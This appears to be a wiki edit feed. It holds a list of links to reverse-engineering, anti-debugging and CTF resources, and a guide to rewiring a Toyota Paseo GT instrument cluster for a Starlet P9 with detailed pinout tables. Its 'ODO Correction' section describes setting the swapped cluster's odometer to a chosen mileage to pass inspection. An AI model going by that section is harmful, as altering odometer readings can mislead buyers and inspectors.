::[https://ghidra.re/ghidra_docs/GhidraClass/Debugger/README.html Debugger.]&lt;br /&gt;
======BSim======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/BSim/README.html BSim.]&lt;br /&gt;
&lt;br /&gt;
=====IDA Material=====&lt;br /&gt;
&lt;br /&gt;
::[[File:Reverse Engineering Malware IDA &amp;amp; Olly Basics 5 parts by otw v1.pdf|thumb]] - A Reverse Engineering Malware introduction and bare basics IDA &amp;amp; Olly x86 (5 parts) by otw.&lt;br /&gt;
&lt;br /&gt;
::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-1/ Using IDAPython to Make Your Life Easier: Part 1] - As a malware reverse engineer, I often find myself using IDA Pro in my day-to-day activities. It should come as no surprise, seeing as IDA Pro is the industry standard (although alternatives such as radare2 and Hopper are gaining traction). One of the more powerful features of IDA that I implore all reverse engineers to make use of is the Python addition, aptly named ‘IDAPython’, which exposes a large number of IDA API calls.&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-2/ Using IDAPython to Make Your Life Easier: Part 2]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-3/ Using IDAPython to Make Your Life Easier: Part 3]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-4/ Using IDAPython to Make Your Life Easier: Part 4]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-5/ Using IDAPython to Make Your Life Easier: Part 5]&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering Some publicly available Malware analysis and Reverse engineering] - is a curated list of awesome materials from the user Dump-GUY a former Forensic, Malware Analyst, Reverse Engineer. [https://www.youtube.com/c/DuMpGuYTrIcKsTeR Youtube channel].&lt;br /&gt;
&lt;br /&gt;
=====x64dbg=====&lt;br /&gt;
&lt;br /&gt;
::[https://help.x64dbg.com/en/latest/introduction/index.html x64dbg] - Introduction &amp;amp; documentation page.&lt;br /&gt;
&lt;br /&gt;
=====Immunity Debugger=====&lt;br /&gt;
&lt;br /&gt;
::[https://class.malware.re/stuff/nardella/basic-reverse-engineering-immunity-debugger-36982.pdf Basic Reverse Engineering with Immunity Debugger] - SANS Institute Information Security Reading Room. Basic Reverse Engineering x86 with Immunity Debugger.&lt;br /&gt;
&lt;br /&gt;
=====Malware Reverse Engineering=====&lt;br /&gt;
&lt;br /&gt;
::[https://tryhackme.com/room/basicmalwarere BasicMalwareRE] - this room aims towards helping everyone learn about the basics of &amp;quot;Malware Reverse Engineering&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
::[https://gist.github.com/IdanBanani/5be0442ad390f89259b494098f450bfd Reversing / Malware Analysis / Assembly -resources] - is a large list of reversing materials and courses.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/CyberSecurityUP/Awesome-Malware-and-Reverse-Engineering Malware and Reverse Engineering Complete Collection] - Awesome Malware and Reverse Engineering collection by Joas.&lt;br /&gt;
&lt;br /&gt;
=====Anti Debugging Protection Techniques with Examples=====&lt;br /&gt;
======x86 (Win32)======&lt;br /&gt;
&lt;br /&gt;
::[https://anti-debug.checkpoint.com/ cp&amp;lt;r&amp;gt; Anti-Debug Tricks] - By Check Point Research: CPR, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide An-Anti-Reverse-Engineering-Guide] - By Joshua Tully hosted on CodeProject, Win32/x86 with examples.&lt;br /&gt;
&lt;br /&gt;
::[https://www.openrce.org/reference_library/anti_reversing OpenRCE Anti Reversing Database] - Mostly if not all Win32/x86. The Anti Reverse Engineering Database provides the analysis and desription for a number of various anti debugging, disassembly and dumping tricks. This resource aims to help reverse engineers locate, identify and bypass such techniques.&lt;br /&gt;
&lt;br /&gt;
::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.&lt;br /&gt;
&lt;br /&gt;
::[[Media:Anti-reverse engineering techniques by Jozef Miljak.pdf]] - An experimental study on which anti-reverse engineering technique are the most effective to protect your software from reversers, Win32/x86.&lt;br /&gt;
&lt;br /&gt;
::[https://forum.tuts4you.com/files/file/1218-anti-reverse-engineering-guide/ Anti-Reverse Engineering Guide By Teddy Rogers] - An individual reading this should have a solid understanding of ASM, how computers handle memory, the Win32 Debugging API, and at least some knowledge of Windows internals. &lt;br /&gt;
&lt;br /&gt;
======x64 (Win64)======&lt;br /&gt;
&lt;br /&gt;
::[https://anti-debug.checkpoint.com/ cp&amp;lt;r&amp;gt; Anti-Debug Tricks] - By Check Point Research: CPR, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.&lt;br /&gt;
&lt;br /&gt;
====Machine code or virtual machine bytecode reference==== &lt;br /&gt;
&lt;br /&gt;
=====Assembly reference / manuals=====&lt;br /&gt;
&lt;br /&gt;
======x86======&lt;br /&gt;
&lt;br /&gt;
::[http://ref.x86asm.net/ Reference x86] - Reference X86 Opcode and Instructions (the holy x86 assembly bible).&lt;br /&gt;
&lt;br /&gt;
======x86 Training======&lt;br /&gt;
::[https://x86re.com/1.html Reverse Engineering for Noobs Part 1] - Brief introduction to RE, executables, compiling, 32-bit x86 syntax, and stack frames.&lt;br /&gt;
&lt;br /&gt;
::[https://x86re.com/2.html Reverse Engineering for Noobs Part 2: Portable Executable Files] - Breakdown of Portable Executable image file headers and sections.&lt;br /&gt;
&lt;br /&gt;
======x86 and amd64======&lt;br /&gt;
&lt;br /&gt;
::[https://www.felixcloutier.com/x86/ x86 and amd64 instruction reference] - Derived from the December 2023 version of the Intel® 64 and IA-32 Architectures Software Developer's Manual.&lt;br /&gt;
&lt;br /&gt;
=====Bytecode reference=====&lt;br /&gt;
======Java Virtual Machine (JVM)======&lt;br /&gt;
&lt;br /&gt;
::[https://en.wikipedia.org/wiki/List_of_Java_bytecode_instructions Wikipedia] - List of Java bytecode instructions.&lt;br /&gt;
&lt;br /&gt;
::[https://javaalmanac.io/bytecode/ The Java Version Almanac] - Java Bytecode, by Mnemonic.&lt;br /&gt;
&lt;br /&gt;
======Dalvik opcodes (Android)======&lt;br /&gt;
&lt;br /&gt;
::[http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html Pallergabor] - Dalvik opcodes documentation with examples.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/user1342/Awesome-Android-Reverse-Engineering Awesome-Android-Reverse-Engineering] - A curated list of awesome Android Reverse Engineering training, resources, and tools.&lt;br /&gt;
&lt;br /&gt;
======Common Language Runtime (CLR) .NET======&lt;br /&gt;
&lt;br /&gt;
::[https://en.wikipedia.org/wiki/List_of_CIL_instructions Wikipedia] - List of CIL instructions.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/stakx/ecma-335/blob/master/docs/TABLE_OF_CONTENTS.md ECMA-335 Documentation] - This Standard defines the Common Language Infrastructure (CLI).&lt;br /&gt;
&lt;br /&gt;
====Reverse Engineering Challenges====&lt;br /&gt;
&lt;br /&gt;
::[https://crackmes.one/ Crackmes.one] - is a simple place where you can download crackmes to improve your reverse engineering skills.&lt;br /&gt;
&lt;br /&gt;
::[https://crackmy.app/ CrackMy.App] - is as place to share your crackmes, solve challenges, and climb the leaderboard in the ultimate reverse engineering community.&lt;br /&gt;
&lt;br /&gt;
====Security Training Classes====&lt;br /&gt;
&lt;br /&gt;
::[https://ost2.fyi/ OpenSecurityTraining2] - is a free, beta-stage online platform built on Open edX that offers in-depth cybersecurity and reverse-engineering courses like x86 assembly, kernel exploitation, and firmware analysis.&lt;br /&gt;
&lt;br /&gt;
====Security CTF====&lt;br /&gt;
Capture the Flag (CTF) in computer security is an exercise in which participants attempt to find text strings, called &amp;quot;flags&amp;quot;, which are secretly hidden in purposefully vulnerable programs or websites.&amp;lt;br&amp;gt;&lt;br /&gt;
Learn more about reverse engineering and cybersecurity start playing CTF's.&lt;br /&gt;
&lt;br /&gt;
::[https://jaimelightfoot.com/blog/so-you-want-to-ctf-a-beginners-guide/ CTF Beginners Guide] - is intended to be a guide for beginners who have just started playing CTFs (or for people who have never played, but would like to).&lt;br /&gt;
&lt;br /&gt;
::[https://ctflearn.com/ CTFlearn] - The most beginner-friendly way to get into hacking. Challenges Test your skills by hacking your way through hundreds of challenges.&lt;br /&gt;
&lt;br /&gt;
::[https://ctf101.org/ CTF101] - a site documenting the basics of playing Capture the Flags. This guide was written and maintained by the OSIRIS Lab at New York University.&lt;br /&gt;
&lt;br /&gt;
::[https://picoctf.org/ picoCTF] - is a free computer security education program with original content built on a capture-the-flag framework created by security and privacy experts.&lt;br /&gt;
&lt;br /&gt;
::[https://microcorruption.com/ MicroCorruption] - is a online, embedded debugger that starts from scratch and introduces the very foundations of memory corruption. Great practice for learning the basics of binary exploitation.&lt;br /&gt;
&lt;br /&gt;
::[https://echoctf.red/ echoctf.red] - A platform to develop, run and administer CTF competitions. The online echoCTF.RED platform user interfaces and codebase.&lt;br /&gt;
&lt;br /&gt;
::[https://pwnable.kr/ Wargames Pwnable.kr] - is a non-commercial wargame site which provides various pwn challenges regarding system exploitation, including reverse engineering, web exploitation, and cryptography.&lt;br /&gt;
&lt;br /&gt;
::[https://pwnable.tw/challenge/ Wargames Pwnable.tw] - is a wargame site for hackers to test and expand their binary exploiting skills. HOW-TO. Try to find out the vulnerabilities exists.&lt;br /&gt;
&lt;br /&gt;
::[https://ctfsites.github.io/ More CTF sites] - A curated list of more CTF sites on Github.&lt;br /&gt;
&lt;br /&gt;
====Embedded security Challenge (ESC)====&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2024 csaw_esc_2024] - CSAW 2024 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2023 csaw_esc_2023] - CSAW 2023 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2022 csaw_esc_2022] - CSAW 2022 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2021 csaw_esc_2021] - CSAW 2021 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/TrustworthyComputing/csaw_esc_2019 csaw_esc_2019] - CSAW 2019 Embedded Security Challenge (Github repo).&lt;br /&gt;
&lt;br /&gt;
====800 MHz AMPS Documentation====&lt;br /&gt;
::[https://wiki.recessim.com/w/images/8/86/Cellular_Telephone_Bible_With_SIDs.txt The Cellular Telephone Bible by Mike Larsen (1997)] Unlock codes and programming procedures of early 800 MHz analog AMPS cellular phones. This document also contains the system IDs (SID) of the 800 MHz analog service providers.&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=Toyota_Paseo_GT_1.5_odometer_Starlet_P9_mod&amp;diff=3265</id>
		<title>Toyota Paseo GT 1.5 odometer Starlet P9 mod</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=Toyota_Paseo_GT_1.5_odometer_Starlet_P9_mod&amp;diff=3265"/>
		<updated>2026-01-01T20:25:54Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: mv&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Modification Overview =&lt;br /&gt;
Modding guide on how to make the '''Toyota Paseo 1.5 GT''' (5E-FE 1995-1999) odometer plug and play &amp;quot;oem-clean&amp;quot; for the '''Toyota P9''' (EP91 4E-FE 1996-1999).&amp;lt;br&amp;gt;&lt;br /&gt;
This mod has the focus on not messing with the car wiring by depinning and changing the OEM wiring, but by modifying the GT cluster.&amp;lt;br&amp;gt; After all while GT parts are relatively abundant, GT cars themselves are far less common on the road, making these odometers extremely cheap and readily available in the Japanese used-parts market. &lt;br /&gt;
&lt;br /&gt;
There are three connectors on the back of these odometer clusters the connectors are both the same type however the pinout is different.&lt;br /&gt;
Most left connector is named '''A''', the middle one '''C''' and the most right one '''B'''. So: '''A, C, B.'''&lt;br /&gt;
&lt;br /&gt;
[[File:Clusters.png|frameless|380×300px|thumb|left]]&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
&lt;br /&gt;
==  Toyota Starlet P9 Instrument Cluster Pinout ==&lt;br /&gt;
Cluster details: P30, with Tachometer by DENSO.&lt;br /&gt;
Part numbers: 83800-10060 and 157370-5241.&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Low battery warning light → diode&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || Low battery warning light&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Parking brake warning light&lt;br /&gt;
|-&lt;br /&gt;
| 4 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 5 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || IG− (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || Low oil pressure warning light (oil pressure switch)&lt;br /&gt;
|-&lt;br /&gt;
| 9 || Connected || IG+ (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 11 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 12 || Connected || SRS airbag warning light&lt;br /&gt;
|-&lt;br /&gt;
| 13 || Connected || SRS airbag warning light&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Fog light indicator&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || High beam indicator&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || High beam indicator&lt;br /&gt;
|-&lt;br /&gt;
| 4 || Connected || Left turn signal indicator&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Upper B (E terminal on Paseo) terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 6 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || Lower 4P terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || Connected || Right turn signal indicator&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Low fuel warning light&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || ABS warning light&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Check engine light&lt;br /&gt;
|-&lt;br /&gt;
| 4 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || E terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || T terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 8 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 11 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 12 || Connected || F terminal – fuel gauge&lt;br /&gt;
|-&lt;br /&gt;
| 13 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 14 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 15 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 16 || NC || —&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==  Paseo GT 1.5 Instrument Cluster Pinout ==&lt;br /&gt;
Cluster details: L17, with Tachometer by JECO.&lt;br /&gt;
Part numbers: 83800-16080 and 82208-001.&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || IG+ (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || Low battery warning light → diode&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Low battery warning light&lt;br /&gt;
|-&lt;br /&gt;
| 4 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Parking brake warning light&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || Parking brake warning light&lt;br /&gt;
|-&lt;br /&gt;
| 7 || Connected || Airbag warning light&lt;br /&gt;
|-&lt;br /&gt;
| 8 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || Connected || P (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 11 || Connected || Airbag warning light&lt;br /&gt;
|-&lt;br /&gt;
| 12 || Connected || Open door warning light&lt;br /&gt;
|-&lt;br /&gt;
| 13 || Connected || Open door warning light&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || High beam indicator&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || Common ground for indicator lights (high beam, turn signals, fog light)&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Left turn signal indicator&lt;br /&gt;
|-&lt;br /&gt;
| 4 || Connected || FU terminal – fuel gauge&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Fog light indicator&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || Lower 4P terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 7 || Connected || Upper E terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || Right turn signal indicator&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || Connected || Master warning light&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Low fuel warning light&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || TU terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || ABS warning light&lt;br /&gt;
|-&lt;br /&gt;
| 4 || Connected || Check engine light (MIL)&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Low oil pressure warning light (oil pressure switch)&lt;br /&gt;
|-&lt;br /&gt;
| 6 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 7 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || TE terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 9 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 11 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 12 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 13 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 14 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 15 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 16 || NC || —&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Instrument Cluster Wiring Modification ==&lt;br /&gt;
These are the modifications needed to be made on the GT cluster.&lt;br /&gt;
Below you will see the tables of traces that will need to be cut first. After cutting them we will rewire them.&lt;br /&gt;
&lt;br /&gt;
=== Cutting Traces ===&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Cutting &lt;br /&gt;
|-&lt;br /&gt;
| 1 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 2 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 3 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 5 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 6 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 10 || CUT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Cutting &lt;br /&gt;
|-&lt;br /&gt;
| 1 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 2 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 3 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 4 || CUT (cut close at FU terminal, leave room to solder)&lt;br /&gt;
|-&lt;br /&gt;
| 5 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 6 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 7 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 8 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 10 || CUT &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Cutting &lt;br /&gt;
|-&lt;br /&gt;
| 2 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 3 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 4 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 5 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 7 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 8 || CUT&lt;br /&gt;
|-&lt;br /&gt;
| 9 || CUT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Rewiring Traces ===&lt;br /&gt;
Rewiring can be done with jumpers made from resistor leads with heat shrink tubing around them or solid core modwire.&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Rewire&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Must now connect to what '''PIN 2''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Must now connect to what '''PIN 3''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Must now connect to what '''PIN 5''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 5 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Must now connect to what '''PIN 10''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Must now connect to '''PIN 5''' on '''connector B (16pin)''' going to oil pressure indicator light&lt;br /&gt;
|-&lt;br /&gt;
| 9 || Must now connect to what '''PIN 1''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC / OPEN&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Rewire&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Must now connect to what '''PIN 5''' went to (FU terminal of fuel gauge)&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Must now connect to what '''PIN 1''' went to (high beam indicator light)&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Must now connect to the top of the high beam indicator light, here we disconnected two traces.&lt;br /&gt;
|-&lt;br /&gt;
| 4 || Must now connect to what '''PIN 3''' went to (left indicator light)&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Must now connect to what '''PIN 7''' went to (E/FE screw terminals)&lt;br /&gt;
|-&lt;br /&gt;
| 6 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Must now connect to what '''PIN 6''' went to (reed switch, purpose unknown) &lt;br /&gt;
|-&lt;br /&gt;
| 10 || Must now connect to what '''PIN 8''' went to (right indicator light)&lt;br /&gt;
|-&lt;br /&gt;
| Jumper || Place a jumper from FE terminal (fuel gauge) to cut trace were '''PIN 2''' went to (top lamp ground)&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;gallery widths=302 heights=182&amp;gt;&lt;br /&gt;
File:Cut_double_trace_high_beam.PNG|Important disconnect two high beam indicator light traces on the top. Just jump the rest of the trace accordingly.&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Rewire&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Must now connect to what '''PIN 3''' went to (now goes to ABS warning indicator light)&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Must now connect to what '''PIN 4''' went to (now goes to check engine light)&lt;br /&gt;
|-&lt;br /&gt;
| 4 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Must now connect to what '''PIN 8''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 8 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 12 || Must now connect to '''PIN 4''' on '''connector C (10pin)''' going to FU fuel gauge terminal&lt;br /&gt;
|-&lt;br /&gt;
| 14 || Must now connect to what '''PIN 7''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 15 || Must now connect to what '''PIN 9''' went to&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery widths=302 heights=182&amp;gt;&lt;br /&gt;
File:Cluster mods.jpg|A picture of all the mods that have been applied.&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== ODO Correction ==&lt;br /&gt;
If you want to correct yours to avoid getting in trouble by road inspection service. You will have to change it back to your old ODO meter milage.&amp;lt;br&amp;gt;&lt;br /&gt;
Please do not abuse this trick.. I have set mine from around 110.000 to 300.000. Just so I don't get in trouble.&amp;lt;br&amp;gt;&lt;br /&gt;
In the image below you can see how I did it.&lt;br /&gt;
&amp;lt;gallery widths=302 heights=182&amp;gt;&lt;br /&gt;
File:Odo correction.jpg&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Notes on the Modification ==&lt;br /&gt;
Leave the four lamps open (remove bulb). Do this for: '''open door warning, SRS airbag warning, park warning lights''' in the bottom left corner under connector A. Also next to connector A you have a the indicator light and a '''triangle warning light'''. Leave the triangle warning light open too. All these light are unused and '''not connected''', connecting them might short something not reverse engineered.&lt;br /&gt;
They must all be left OPEN FLOATING ('''important''').&lt;br /&gt;
&lt;br /&gt;
= Night time backlight =&lt;br /&gt;
[[File:Nighttime running.png|frameless|380×300px|thumb|left]]&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=Automotive&amp;diff=3264</id>
		<title>Automotive</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=Automotive&amp;diff=3264"/>
		<updated>2025-12-31T14:39:51Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: add cluster&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[File:Jeep Fuses.jpg|thumb|Fuse box in a Jeep Wrangler]]&lt;br /&gt;
Everything related to reverse engineering automobiles, motorcycles or anything similar.&lt;br /&gt;
==Device Index==&lt;br /&gt;
&lt;br /&gt;
===On Vehicle Targets===&lt;br /&gt;
[[Yamaha EBike Battery Dongle]] - A way to use Homemade and Third party batteries on a E-Bike that requires communication to be able to turn on.&lt;br /&gt;
&lt;br /&gt;
[[Zadi E-Lock system]] - Motorcycle Key, lock and immobilizer system.&lt;br /&gt;
&lt;br /&gt;
===Aftermarket Parts or Accessories===&lt;br /&gt;
[[Parking_Pilot]]&lt;br /&gt;
&lt;br /&gt;
[[Starcom Helios]] - GPS/GSM vehicle tracking device (fleet management)&lt;br /&gt;
&lt;br /&gt;
